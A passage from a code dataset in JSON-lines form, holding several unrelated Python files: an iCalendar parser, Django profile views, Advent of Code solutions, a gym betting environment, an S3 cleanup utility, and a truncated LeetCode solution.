sys.exit(0)\n","repo_name":"TomasBahnik/ml","sub_path":"handson-ml2/02_end_to_end_machine_learning_project/prepare_train_test_sets.py","file_name":"prepare_train_test_sets.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70207002169","text":"\r\n'''\r\nWebdriver offers API to take screenshot of a webpage\r\n1- save_screenshot('filename')\r\n2- get_screenshot_as_file('filename')\r\n'''\r\n\r\nfrom selenium import webdriver\r\n\r\n\r\ndriver = webdriver.Chrome(executable_path='chromedriver.exe')\r\ndriver.get('http://demo.guru99.com/test/newtours/index.php')\r\n\r\ndriver.save_screenshot('F:\\\\homepage.png')\r\n\r\n\r\ndriver.get_screenshot_as_file('F:\\\\homepage2.png')\r\n","repo_name":"faizan352/selenium_webdriver","sub_path":"take_screen_shots.py","file_name":"take_screen_shots.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"8086792955","text":"import os\nfrom math import floor, ceil\nfrom .classes import Event, Calendar, Property, Timezone\n\ndef foldtoICS(calendarList):\n \"\"\"foldtoICS takes a list of calendar objects and returns an ICalendar friendly string.\"\"\"\n ICSString = ''\n for cal in calendarList:\n ICSString += \"BEGIN:VCALENDAR\\n\"\n for prop in cal.properties:\n ICSString += foldedProperty(prop)\n for entry in cal.timezones:\n ICSString += \"BEGIN:VTIMEZONE\\n\"\n for prop in entry.properties:\n ICSString += foldedProperty(prop)\n if len(entry.standardProperties) > 0:\n ICSString += \"BEGIN:STANDARD\\n\"\n for prop in entry.standardProperties:\n ICSString += foldedProperty(prop)\n ICSString += \"END:STANDARD\\n\"\n if len(entry.daylightProperties) > 0:\n ICSString += \"BEGIN:DAYLIGHT\\n\"\n for prop in entry.daylightProperties:\n ICSString += foldedProperty(prop)\n ICSString += \"END:DAYLIGHT\\n\"\n ICSString += \"END:VTIMEZONE\\n\"\n for event in cal.events:\n ICSString += \"BEGIN:VEVENT\\n\"\n for prop in event.properties:\n ICSString += foldedProperty(prop)\n ICSString += \"END:VEVENT\\n\"\n ICSString += \"END:VCALENDAR\\n\"\n return ICSString\n\n\ndef foldedProperty(prop):\n \"\"\"\n foldedProperty takes a full property and returns an iCalendar compliant\n folded string. \n \"\"\"\n prop.value = prepICSText(prop.value)\n checkString = ''\n if len(prop.parameters) > 0:\n checkString += f\"{prop.name};\"\n for param, val in prop.parameters.items():\n checkString += f\"{param}={val};\"\n checkString += f\":{prop.value}\\n\"\n else:\n checkString += f\"{prop.name}:{prop.value}\\n\"\n length = len(checkString)\n ICSstring = ''\n if length > 73:\n x = ceil(length/73)\n for i in range(x):\n if i == x-1:\n ICSstring += checkString[(i*73):length]\n else:\n ICSstring += checkString[(i*73):((i+1)*73)] + \"\\n \"\n else: \n ICSstring += checkString\n return ICSstring\n\ndef unfoldToCalendarList(stream):\n \"\"\"\n unfoldToCalendarList takes an opened stream from an iCalendar file (See IETF REF 5545,7986)\n and returns a list of calendar objects, with all compatiable components returned as\n objects nested within said calendar objects.\n \"\"\" \n rawStringList = stream.read(-1).splitlines()\n rawLength = len(rawStringList)\n unfoldedStrings = []\n storageString = ''\n ## We're going to have to concanate several strings in a row at times, so need to keep\n ## track of string indexes already added to our new list of strings.\n indexToSkip = []\n ## so we'll go go from string to string, checking if the string ahead\n for i in range(rawLength):\n if i not in indexToSkip and rawStringList[i].startswith('X-') != True:\n storageString = rawStringList[i]\n checkFurther = checkNextString(rawStringList, i, storageString, rawLength)\n if checkFurther[0] == []:\n unfoldedStrings.append(storageString)\n else:\n unfoldedStrings.append(checkFurther[1])\n for item in checkFurther[0]:\n indexToSkip.append(item)\n ## Since .ics files are built to hold multiple calendars, I think we store any import\n ## as a list.\n if unfoldedStrings[0] != \"BEGIN:VCALENDAR\":\n return print(\"Error: Line 1 does not contain 'BEGIN:VCALENDAR\")\n calendarList = []\n ## need to keep track of our calendars\n calendarCount = 0\n ## and events per calendar\n eventCount = 0\n timezoneCount = 0\n PropOwnership = \"\"\n for phrase in unfoldedStrings:\n ## ignore empty lines\n if phrase == \"\":\n continue\n ## We send the most likely propVal split into checkEscapedColon,\n ## which will recursively check for dqoute escapes in parameter values.\n propVal = phrase.split(\":\", maxsplit=1)\n escapedPropParam = checkEscapedColon(phrase, propVal[0])\n escapedPropVal = phrase.replace(escapedPropParam + \":\", '')\n ## Switch-a-palooza\n if escapedPropParam == \"BEGIN\":\n if escapedPropVal == \"VCALENDAR\":\n calendarList.append(Calendar())\n PropOwnership = \"CALENDAR\"\n elif escapedPropVal == \"VEVENT\":\n calendarList[calendarCount].events.append(Event())\n PropOwnership = \"EVENT\"\n elif escapedPropVal == \"VTIMEZONE\":\n calendarList[calendarCount].timezones.append(Timezone())\n PropOwnership = \"TIMEZONE\"\n elif escapedPropVal == \"STANDARD\":\n PropOwnership += \":STANDARD\"\n elif escapedPropVal == \"DAYLIGHT\":\n PropOwnership += \":DAYLIGHT\"\n else:\n PropOwnership = ''\n elif escapedPropParam == \"END\":\n ## if we end a calendar, increment calendarCount by 1, reset eventCount\n if escapedPropVal == \"VCALENDAR\":\n calendarCount += 1\n eventCount = 0\n elif escapedPropVal == \"VEVENT\":\n eventCount += 1\n elif escapedPropVal == \"VTIMEZONE\":\n timezoneCount += 1\n elif escapedPropVal == \"STANDARD\":\n PropOwnership = \"TIMEZONE\"\n elif escapedPropVal == \"DAYLIGHT\":\n PropOwnership == \"TIMEZONE\"\n else:\n cleanValue = cleanICSText(escapedPropVal)\n ## What monster would use a semi-colon within a parameter?? Well, now if they do I \n # don't have to worry about it.\n propParams = checkEscapedSemiColon(escapedPropParam)\n propName = propParams[0]\n paramList = []\n if len(propParams) != 1:\n propParams.pop(0)\n ## Filter out X- params\n for param in propParams:\n ## While I think it is not exactly what was envisioned in spec,\n ## we get empty strings from our splits when we have a semicolon\n ## before a colon. While it's an error from decoding our own encoding,\n ## I don't see a downside in adding this extra precaution, to stop\n ## our decoder from grinding to a halt.\n if param.startswith(\"X-\") or len(param) < 1:\n pass\n else:\n paramList.append(param)\n if PropOwnership == \"CALENDAR\":\n calendarList[calendarCount].properties.append(\n Property(propName, cleanValue, paramList)\n )\n elif PropOwnership == \"EVENT\":\n calendarList[calendarCount].events[eventCount].properties.append(\n Property(propName, cleanValue, paramList)\n )\n elif PropOwnership.startswith(\"TIMEZONE\"):\n if PropOwnership.endswith(\"STANDARD\"):\n calendarList[calendarCount].timezones[timezoneCount].standardProperties.append(\n Property(propName, cleanValue, paramList)\n )\n elif PropOwnership.endswith(\"DAYLIGHT\"):\n calendarList[calendarCount].timezones[timezoneCount].daylightProperties.append(\n Property(propName, cleanValue, paramList)\n )\n else:\n calendarList[calendarCount].timezones[timezoneCount].properties.append(\n Property(propName, cleanValue, paramList)\n )\n return calendarList\n\n## A colon split is fine for 90% of of all properties, except for a small subset where a colon is escaped in a dqoute.\n## so how do we detect this? I think the best way is to do a count of dquotes we have in the property/param\n## area after the split. If we have an odd number of dqoutes, then we must be in the middle of an escaped \n## parameter, and we can instead split by colon and add the rightmost splits to each other until we have\n## an even number of DQoutes. \ndef checkEscapedColon(phrase, tentativeProperty, recursed=0):\n \"\"\"\n checkEscapedColon checks for colons escaped by doubles quotes in a value of a parameter \n when reading an ics phrase. This Function takes a complete PROP;PARAM=VALUE;...:VALUE \n 'phrase', along with the initial 'tentativeProperty' of how the phrase should be split. \n Recursed is to be left as default, is used as a counter to properly consider \n progressively longer strings. Returns the entire PROP;PARAM=VALUE;...: string.\n \"\"\"\n correctString = ''\n if tentativeProperty.find('\"') != -1:\n checkDQoutes = tentativeProperty.split('\"')\n ## if checkDQoutes is an even number of strings we have an unclosed dqoute \n if len(checkDQoutes) % 2 == 0:\n colonHunter = phrase.split(\":\")\n recursed += 1\n potentialPropVal = ''\n for i in range(recursed + 1):\n potentialPropVal += colonHunter[i] + \":\"\n escaped = checkEscapedColon(phrase, potentialPropVal, recursed=recursed)\n if len(escaped.split('\"')) % 2 == 1:\n correctString += escaped.rstrip(\":\")\n else:\n correctString += tentativeProperty\n else:\n correctString += tentativeProperty\n return correctString\n\n## We should check for semi-colons escaped in parameters.\ndef checkEscapedSemiColon(phrase):\n \"\"\"\n checkEscapedSemiColon is another parsing function, similar to checkEscapedColon, except\n that it only needs to take a PROP;PARAM=VALUE;...: portion of an ics phrase. Returns\n a list of of all items delimited by a semi colon that are not escaped.\n \"\"\"\n paramList = phrase.split(\";\")\n paramLen = len(paramList)\n popList = []\n for i in range(paramLen):\n if i in popList:\n continue\n if paramList[i].find('\"') != -1:\n ## much like before, we find a quotation mark, see if it is closed. \n if len(paramList[i].split('\"')) % 2 == 0:\n paramList[i] += \";\" + paramList[i+1]\n paramList.pop(i+1)\n ## Best Bug: Tried using len(popList) as I was appending, which \n ## (duh) gives you the length of the list pre-append. \"+ 1\" is truly\n ## the mvp of programming.\n popList.append(paramLen - (len(popList) + 1))\n else:\n ## cool, no quotes.\n pass\n return paramList\n\n## Note: There is no checkEscapedComma, in part because our model assumed Parameters only have one value,\n## and because of considerations for fields like alt-rep. \n\n## checks the next string for folding, otherwise returns a list of indexs already\n## associated with the new concanated string.\ndef checkNextString(StringList, index, storageString, rawlength):\n \"\"\"\n checkNextString takes a parsed ICS string list, along with the current index being read,\n the string the user is writing to along with the rawlength of the string list. returns\n a tuple containing the indexes we combined into the string, as well as an updated \n storage string.\n \"\"\"\n ## a list of indexs of strings concanated to make our storage string\n indexToSkip = []\n ## make sure the index we are checking isn't out of bounds, has a single whitespace\n ## to being\n if index + 1 < rawlength and StringList[index+1].startswith(\" \"):\n ## combine our strings, replace \" \" instead of lstrip to preserve spaces between\n ## words that coincide with folds.\n storageString += StringList[index+1].replace(\" \", \"\", 1)\n indexToSkip.append(index+1)\n checkFurther = checkNextString(StringList, index+1, storageString, rawlength)\n ## did we change the string?\n if checkFurther[1] != storageString:\n for i in checkFurther[0]:\n indexToSkip.append(i)\n ## get the full string\n storageString = checkFurther[1]\n return indexToSkip, storageString\n\ndef cleanICSText(string):\n \"\"\"\n cleanICSText takes a string with iCalendar TEXT escapes, and returns a python\n friendly string.\n \"\"\"\n newstring = string.replace('\\\\\\\\', \"\\\\\").replace('\\\\;', \";\").replace('\\\\,', \",\")\n return newstring\n\ndef prepICSText(string):\n \"\"\"prepICSText takes a python string and returns a properly escaped iCalendar TEXT\"\"\"\n newstring = string.replace('\\\\', \"\\\\\\\\\").replace('\\\\\\\\n','\\\\n').replace(';', '\\\\;').replace(',', \"\\\\,\")\n return newstring\n\ndef main():\n testfile = open('example.ics', 'r', encoding='UTF-8')\n calList = unfoldToCalendarList(testfile) \n print(calList[0])\n print(\"<-------------------->\")\n backtoICS = foldtoICS(calList)\n print(backtoICS)\n with open(\"new.ics\", \"w\", encoding='UTF-8') as newfile:\n print(backtoICS, file=newfile)\n\nif __name__ == \"__main__\":\n main()","repo_name":"PhiloTFarnsworth/MarketMePostMortem","sub_path":"MMcalendar/MMiCAL/MMiCal.py","file_name":"MMiCal.py","file_ext":"py","file_size_in_byte":13199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72297241849","text":"# uncompyle6 version 3.6.5\n# Python bytecode 3.3 (3230)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: C:\\Users\\Steve\\workspace\\DnD_Add_Detail\\src\\sare\\DnD_Main\\Power.py\n# Compiled at: 2013-12-21 06:38:22\n__doc__ = '\\nCreated on Dec 17, 2013\\n\\n@author: Steve Sare\\n'\n\nclass Power(object):\n \"\"\"Power\"\"\"\n\n def __init__(self):\n \"\"\"\n Constructor\n \"\"\"\n pass\n\n def writePowers(self, output, ref, newChar):\n output.emit('Processing Powers...')\n root = newChar.getroot()\n for power in root.iter('Power'):\n self.writePower(ref, power)\n\n output.emit('Powers written')\n\n def writePower(self, ref, power):\n from sare.DnD_Main.CharacterFile import CharacterFile\n charFile = CharacterFile()\n refroot = ref.getroot()\n for rule in refroot.iter('RulesElement'):\n if rule.get('name') == power.get('name') and rule.get('type') == 'Power':\n for specific in power.findall('specific'):\n power.remove(specific)\n\n for flavor in rule.findall('Flavor'):\n charFile.writeFlavor(flavor, power)\n\n index = 1\n for specificref in rule.findall('specific'):\n power.insert(index, specificref)\n index = index + 1\n\n continue","repo_name":"CBLoader/DetailAdder","sub_path":"sare/DnD_Main/Power.py","file_name":"Power.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23610266472","text":"import numpy as np\nimport sys\n\nnp.set_printoptions(threshold=sys.maxsize)\n\nfrom tool.runners.python import SubmissionPy\n\nBASE_PATTERN = np.array([0, 1, 0, -1])\nN_PHASES = 100\n\n\nclass ThoreSubmission(SubmissionPy):\n def run(self, s):\n # :param s: input in string format\n # :return: solution flag\n x = np.array([int(d) for d in s], dtype=np.int)\n n = len(x)\n\n F = BASE_PATTERN[\n np.mod(\n np.arange(1, n + 1, dtype=np.int)[:, np.newaxis]\n // np.arange(1, n + 1, dtype=np.int),\n len(BASE_PATTERN),\n ).T\n ]\n\n for _ in range(N_PHASES):\n x = np.mod(np.abs(F @ x), 10)\n\n return \"\".join([str(d) for d in x[:8]])\n","repo_name":"lypnol/adventofcode-2019","sub_path":"day-16/part-1/thore.py","file_name":"thore.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"70087544569","text":"from computer import Computer\n\n\ndef part1(grid):\n result = sum(\n r * c\n for r in range(1, len(grid) - 1)\n for c in range(1, len(grid[r]) - 1)\n if all(\n x == \"#\"\n for x in (\n grid[r][c],\n grid[r - 1][c],\n grid[r][c - 1],\n grid[r + 1][c],\n grid[r][c + 1],\n )\n )\n )\n print(result)\n\n\ndef rotated(orientation):\n return {\"^\": \"<\", \"<\": \"v\", \"v\": \">\", \">\": \"^\"}[orientation]\n\n\ndef find_instructions(grid):\n orientations = {\n \"^\": (-1, 0),\n \"<\": (0, -1),\n \"v\": (1, 0),\n \">\": (0, 1),\n }\n\n # Find the initial orientation and position.\n state = next(\n (grid[r][c], r, c)\n for r in range(len(grid))\n for c in range(len(grid[r]))\n if grid[r][c] in orientations\n )\n prev_state = None\n\n rotations = 0\n instructions = []\n\n while rotations < 4:\n orientation, r, c = state\n dr, dc = orientations[orientation]\n next_r, next_c = r + dr, c + dc\n if (\n next_r not in range(len(grid))\n or next_c not in range(len(grid[next_r]))\n or grid[next_r][next_c] != \"#\"\n or (prev_state and prev_state[1:] == (next_r, next_c))\n ):\n rotations += 1\n state = (rotated(orientation), r, c)\n else:\n if rotations:\n instructions.append({1: \"L\", 3: \"R\"}[rotations])\n if not instructions or not isinstance(instructions[-1], int):\n instructions.append(0)\n instructions[-1] += 1\n rotations = 0\n prev_state = state\n state = (orientation, next_r, next_c)\n\n return instructions\n\n\ndef find_pattern_sequence(patterns, data):\n result = []\n i = 0\n while i < len(data):\n for pattern_idx, pattern in enumerate(patterns):\n if data[i : i + len(pattern)] == pattern:\n i += len(pattern)\n result.append(pattern_idx)\n break\n else:\n return None\n return result\n\n\ndef find_patterns(data, num_patterns=3):\n if num_patterns == 0:\n return ([], []) if not data else None\n for pattern_len in range(10, 1, -2):\n pattern = data[:pattern_len]\n rest = []\n i = 0\n while i < len(data):\n if data[i : i + pattern_len] == pattern:\n i += pattern_len\n else:\n rest.append(data[i])\n i += 1\n next_result = find_patterns(rest, num_patterns - 1)\n if next_result is not None:\n other_patterns = next_result[0]\n all_patterns = [pattern] + other_patterns\n pattern_sequence = find_pattern_sequence(all_patterns, data)\n if pattern_sequence:\n return all_patterns, pattern_sequence\n\n\ndef part2(grid, data):\n instructions = find_instructions(grid)\n patterns, sequence = find_patterns(instructions)\n\n main_routine = [\n ord(c) for c in \",\".join(chr(ord(\"A\") + i) for i in sequence) + \"\\n\"\n ]\n function_a = [ord(c) for c in \",\".join(str(x) for x in patterns[0]) + \"\\n\"]\n function_b = [ord(c) for c in \",\".join(str(x) for x in patterns[1]) + \"\\n\"]\n function_c = [ord(c) for c in \",\".join(str(x) for x in patterns[2]) + \"\\n\"]\n output_opt = [ord(c) for c in \"n\\n\"]\n\n data[0] = 2\n computer = Computer(data)\n\n for value in main_routine + function_a + function_b + function_c + output_opt:\n computer.input(value)\n print(computer.run())\n\n\ndef main(grid, data):\n part1(grid)\n part2(grid, data)\n\n\nif __name__ == \"__main__\":\n from input import day17\n\n data = [int(c) for c in day17.split(\",\")]\n computer = Computer(data)\n grid_str = \"\".join(chr(i) for i in computer).strip()\n grid = grid_str.splitlines()\n main(grid, data)\n","repo_name":"cspickert/advent-of-code-2019","sub_path":"day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74213173688","text":"'''\r\nUnittests for PrimeMover.py\r\nDecember 2020 Jakub Kazimierski\r\n'''\r\n\r\nimport unittest\r\nimport PrimeMover\r\n\r\nclass test_PrimeMover(unittest.TestCase): \r\n '''\r\n Class with unittests for PrimeMover.py\r\n '''\r\n\r\n # region Unittests\r\n def test_ExpectedOutput(self):\r\n '''\r\n Checks if returned output is as expected.\r\n '''\r\n output = PrimeMover.PrimeMover(16)\r\n self.assertEqual(output, 53)\r\n\r\n # endregion\r\n\r\nif __name__ == \"__main__\":\r\n '''\r\n Main method for test cases.\r\n '''\r\n unittest.main()","repo_name":"JakubKazimierski/PythonPortfolio","sub_path":"Coderbyte_algorithms/Medium/PrimeMover/test_PrimeMover.py","file_name":"test_PrimeMover.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"4881176441","text":"import uuid\nfrom django.views.generic import DetailView\n\nfrom .models import UserProfileInfo\nfrom users.models import CustomUser\n\nfrom django.shortcuts import (\n redirect,\n render,\n get_object_or_404,\n HttpResponseRedirect,\n reverse\n)\n\nfrom .forms import SaveProfileForm\n\n\n\ndef detailUserProfileInfo(request, pk):\n\n \"\"\" Shows detailView of User\"\"\"\n\n\n a = UserProfileInfo.objects.filter(id_id=request.user.id)\n user_profile_info = None\n if not a:\n message = 'Profile not edited'\n else:\n user_profile_info = a[0]\n message = 'Profile edited'\n\n\n \n custom_user = CustomUser.objects.filter(id=request.user.id)[0]\n\n if request.method == \"POST\" and not a:\n form = SaveProfileForm(request.POST, request.FILES)\n if form.is_valid():\n \n User_image = form.cleaned_data['User_image']\n\n profile = form.save(commit=False)\n profile.first_name = request.user.first_name\n profile.last_name = request.user.last_name\n profile.id_id = request.user.id\n profile.save()\n \n\n if User_image:\n\n user_thumbnail = CustomUser.objects.get(id=request.user.id)\n user_thumbnail.image_thumbnail = User_image\n user_thumbnail.save()\n \n \n \n return redirect('user_profile_info', pk=profile.pk)\n\n else:\n print(form.errors)\n message = form.errors\n return render(request, \"message/error.html\", {'message': message})\n\n elif a:\n \"\"\" As Profile edited for the first time now when user click edit profile this \n section of code will run and will update the data.\"\"\"\n\n\n # fetch the object related to passed pk\n obj = get_object_or_404(UserProfileInfo, pk = pk)\n \n if request.method == \"POST\":\n \n # pass the object as instance in form \n form = SaveProfileForm(request.POST, request.FILES, instance=obj) \n \n # save the data from the form and \n # redirect to detail_view \n if form.is_valid(): \n User_image = form.cleaned_data['User_image']\n\n profile = form.save(commit=False)\n profile.id_id = request.user.id\n profile.save()\n \n\n if User_image:\n\n user_thumbnail = CustomUser.objects.get(id=request.user.id)\n user_thumbnail.image_thumbnail = User_image\n user_thumbnail.save()\n\n\n \n return redirect('user_profile_info', pk=pk) # Calling via url name\n else:\n print(form.errors)\n message = form.errors\n return render(request, \"message/error.html\", {'message': message})\n else:\n form = SaveProfileForm(instance=obj)\n #return render(request, \"user_profile/user_profile.html\", {'form':form})\n\n \n else:\n \"\"\"As profile not edited yet for the first time so only going to render the form\"\"\"\n form = SaveProfileForm()\n\n \n \n return render(request, 'user_profile/user_profile.html', {'custom_user': custom_user, 'message': message,\n 'user_profile_info':user_profile_info, 'form':form})\n\n\n\ndef getUseridFromApplicantList(request):\n Applicant_id = request.POST.get('id')\n #join_result = UserProfileInfo.objects.select_related('id')\n User_uuid = UserProfileInfo.objects.filter(id_id=Applicant_id).values('u_id')\n\n return redirect('detailProfileViewForPublic', User_uuid[0][\"u_id\"])\n\n\ndef detailProfileViewForPublic(request, pk):\n User_id = UserProfileInfo.objects.filter(u_id=pk).values('id_id')[0][\"id_id\"]\n join_result = UserProfileInfo.objects.filter(id_id=User_id).select_related()[0]\n\n return render(request, 'user_profile/user_profile_for_public.html', {'join_result': join_result})\n\n\n\n\n\n\n\n\n\ndef GetUserProfileUuId(request):\n profile_uuid = UserProfileInfo.objects.filter(id_id=request.user.id).values('u_id')\n\n if not profile_uuid:\n user_uuid = CustomUser.objects.filter(id=request.user.id).values('uuid')\n return redirect('user_profile_info', user_uuid[0][\"uuid\"])\n else:\n return redirect('user_profile_info', profile_uuid[0][\"u_id\"])\n\n\n","repo_name":"BarunBlog/Link_People","sub_path":"user_profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73651322169","text":"#!/bin/env python3\n\nfrom datetime import datetime, timezone\nimport os\nimport boto3\n\n\ndef delete_s3_objects():\n bucket = os.getenv('AWS_S3_BUCKET')\n dry_run = os.getenv('DRYRUN', '0')\n dry_run = int(dry_run)\n\n delete_until = os.getenv('DELETE_UNTIL_DATE')\n if delete_until:\n delete_until = datetime.strptime(delete_until, '%Y-%m-%d %H:%M:%S')\n else:\n delete_until = datetime.now()\n\n delete_until = delete_until.replace(tzinfo=timezone.utc)\n\n print(f\"Deleting all objects from s3 bucket {bucket} until {delete_until} (dry-run: {dry_run})\")\n s3 = boto3.resource('s3')\n bucket = s3.Bucket(bucket)\n\n for obj in bucket.objects.all():\n if obj.last_modified < delete_until:\n if dry_run > 0:\n print(f\"(dry-run) deleting {obj.key}\")\n else:\n print(f\"deleting {obj.key}\")\n obj.delete()\n\n\nif __name__ == '__main__':\n delete_s3_objects()\n","repo_name":"openshift-assisted/assisted-events-scrape","sub_path":"assisted-events-scrape/ccx_export/delete_from_ccx_s3_bucket.py","file_name":"delete_from_ccx_s3_bucket.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70961173369","text":"from gym import Env, logger\nfrom gym import spaces\nfrom gym.utils import colorize, seeding\nimport numpy as np\nfrom six import StringIO\nimport sys\nimport math\nimport pandas as pd\nfrom network import Network\n\nclass FA_Env(Env):\n\n def __init__(self):\n self.matches, self.results, self.odds = self.getSeason('recent_seasons_filled_unnormalized.csv', 'recent_seasons_PCA_99_pct_44_components.csv')\n\n #print(self.matches)\n self.match_index = None\n self.match = None\n self.match_winner = None\n\n\n self.cash = 50\n\n self.action_space = spaces.Tuple((spaces.Discrete(math.floor(self.cash + 1)), spaces.Discrete(3)))\n\n self.observation = 0\n\n BetNet = Network(self.matches.shape[1])\n BetNet.load_weights(\"weights-improvement-100-0.52.hdf5\")\n\n self.predictions = np.zeros(self.results.shape)\n for r in range(self.matches.shape[0]):\n match = self.matches[r]\n self.predictions[r] = BetNet.model.predict(np.array([match]))[0]\n\n\n def step(self, action):\n assert self.action_space.contains(action)\n bet_amount, bet_team = action\n\n #Determine rewards, update cash\n reward = 0\n done = False\n lastCash = self.cash\n curr_odds = self.odds[self.match_index][bet_team]\n if bet_team == self.match_winner:\n self.cash += bet_amount * (curr_odds - 1)\n else:\n self.cash -= bet_amount\n\n reward = self.cash - lastCash\n if self.cash <= 1 or self.match_index >= self.matches.shape[0]-1:\n done = True\n # reward = self.cash\n\n\n #Update the State\n #set match index += 1\n #set match = self.matches[self.match_index]\n #update match_winner\n if not done:\n self.match_index += 1\n self.match = self.matches[self.match_index]\n self.match_odds = self.odds[self.match_index]\n self.match_predictions = self.predictions[self.match_index]\n self.match_winner = self.getMatchWinner()\n self.action_space = spaces.Tuple((spaces.Discrete(math.floor(self.cash + 1)), spaces.Discrete(3)))\n\n return (self.match_predictions, self.match_odds, self.cash), reward, done, {\"cash\": self.cash}\n\n\n def reset(self):\n self.match_index = 0\n self.match = self.matches[self.match_index]\n self.match_odds = self.odds[self.match_index]\n self.match_predictions = self.predictions[self.match_index]\n self.match_winner = self.getMatchWinner()\n\n self.cash = 50\n self.observation = 0\n self.action_space = spaces.Tuple((spaces.Discrete(self.cash + 1), spaces.Discrete(3)))\n\n return (self.match_predictions, self.match_odds, self.cash)\n\n def getSeason(self, match_source, NN_train_source):\n\n top_odds_per_match = pd.read_csv(\"data/recent_seasons_max_odds.csv\")\n print(\"LOADING DATA...\")\n x = pd.read_csv('data/recent_seasons_PCA_99_pct_44_components.csv')\n\n\n y = pd.read_csv('data/labels_recent_seasons.csv')\n #print( x, y)\n x = x.as_matrix()\n y = y.as_matrix()\n top_odds_per_match = top_odds_per_match.as_matrix()\n return x, y, top_odds_per_match\n\n\n def getMatchWinner(self):\n winner_index, = np.where(self.results[self.match_index] == 1)\n return winner_index\n\n\n#######################################################################################\n#\n#\n#\n#\n#\n########################################################################################\n# TODO DQN ENV\n","repo_name":"zsimone10/FIFABets","sub_path":"env/faenv.py","file_name":"faenv.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"17161056035","text":"import numpy as np\n\nfrom .warp_image import warp_images\n\n\ndef _get_regular_grid(image, points_per_dim):\n nrows, ncols = image.shape[0], image.shape[1]\n rows = np.linspace(0, nrows, points_per_dim)\n cols = np.linspace(0, ncols, points_per_dim)\n rows, cols = np.meshgrid(rows, cols)\n return np.dstack([cols.flat, rows.flat])[0]\n\n\ndef _generate_random_vectors(image, src_points, scale):\n dst_pts = src_points + np.random.uniform(-scale, scale, src_points.shape)\n return dst_pts\n\n\ndef _thin_plate_spline_warp(image, src_points, dst_points, keep_corners=True):\n width, height = image.shape[:2]\n if keep_corners:\n corner_points = np.array(\n [[0, 0], [0, width], [height, 0], [height, width]])\n src_points = np.concatenate((src_points, corner_points))\n dst_points = np.concatenate((dst_points, corner_points))\n out = warp_images(src_points, dst_points,\n np.moveaxis(image, 2, 0),\n (0, 0, width - 1, height - 1))\n return np.moveaxis(np.array(out), 0, 2)\n\n\ndef tps_warp(image, points_per_dim, scale):\n width, height = image.shape[:2]\n src = _get_regular_grid(image, points_per_dim=points_per_dim)\n dst = _generate_random_vectors(image, src, scale=scale*width)\n out = _thin_plate_spline_warp(image, src, dst)\n return out\n\ndef tps_warp_2(image, dst, src):\n out = _thin_plate_spline_warp(image, src, dst)\n return out","repo_name":"eliahuhorwitz/DeepSIM","sub_path":"util/tps_warp.py","file_name":"tps_warp.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":412,"dataset":"github-code","pt":"77"} +{"seq_id":"25986448377","text":"# Import needed modules\nimport string\nimport datetime\nimport random\nimport time\nimport re\n\n\n# Declare some needed variables\n# time_range = overall time range to be searched\n# time_crystals = discrete buckets of time you want to chunk the search into (extra points for the Star Trek reference!)\ntime_earliest = 201\ntime_latest = 1\ntime_diff = time_earliest-time_latest\ntime_crystals = 50\nnum_jobs = time_diff/time_crystals\nnum_jobs = int(round(num_jobs))\n\nprint(\"Earliest in seconds\")\nprint(time_earliest)\nprint(\"Latest in seconds\")\nprint(time_latest)\nprint(\"Diff in seconds\")\nprint(time_diff)\nprint(\"Time buckets\")\nprint(time_crystals)\nprint(\"Final number of jobs\")\nprint(num_jobs)\n\nsearch_job = \"index=_internal | stats count\"\nstr(search_job)\n\nfor x in range(num_jobs):\n y = time_earliest-time_crystals\n z = time_earliest+time_crystals\n if y < time_earliest:\n y = y-(time_crystals*x)\n z = z-(time_crystals*x)\n print(\"job number \" + str(x) + \" Runs search: latest=-\" + str(y) + \"s \" + \"earliest=-\" + str(z) + \"s \" + str(search_job))\n","repo_name":"klawrencegupta-splunk/scripts","sub_path":"exporter.py","file_name":"exporter.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"14944463822","text":"import re\n\n\ndef solve_regex(string):\n N = len(string) // 2 # 1\n\n return sum(int(a) for a, b in zip(string, string[N:]+string[:N]) if a == b)\n\n\nwith open('input.txt') as f:\n data = f.read().strip()\n\n\nprint(solve_regex(data))\n","repo_name":"antonsandberg/Advent-of-Code-2017","sub_path":"Day 1/Day 1.py","file_name":"Day 1.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27322531099","text":"class Solution:\n def sortItems(self, n: int, m: int, group: List[int], beforeItems: List[List[int]]) -> List[int]:\n items_graph = defaultdict(list)\n \n group_graph = defaultdict(list)\n \n indegrees_items = defaultdict(int)\n \n indegrees_groups = defaultdict(int) \n \n # to create group for ungrouped \n for i in range(len(group)):\n if group[i] == -1:\n group[i] = m\n m += 1\n \n for node, prereq in enumerate(beforeItems):\n node_group = group[node]\n \n for pn in prereq:\n items_graph[pn].append(node)\n indegrees_items[node] += 1\n \n ns_group = group[pn] \n \n if ns_group != node_group:\n group_graph[ns_group].append(node_group)\n 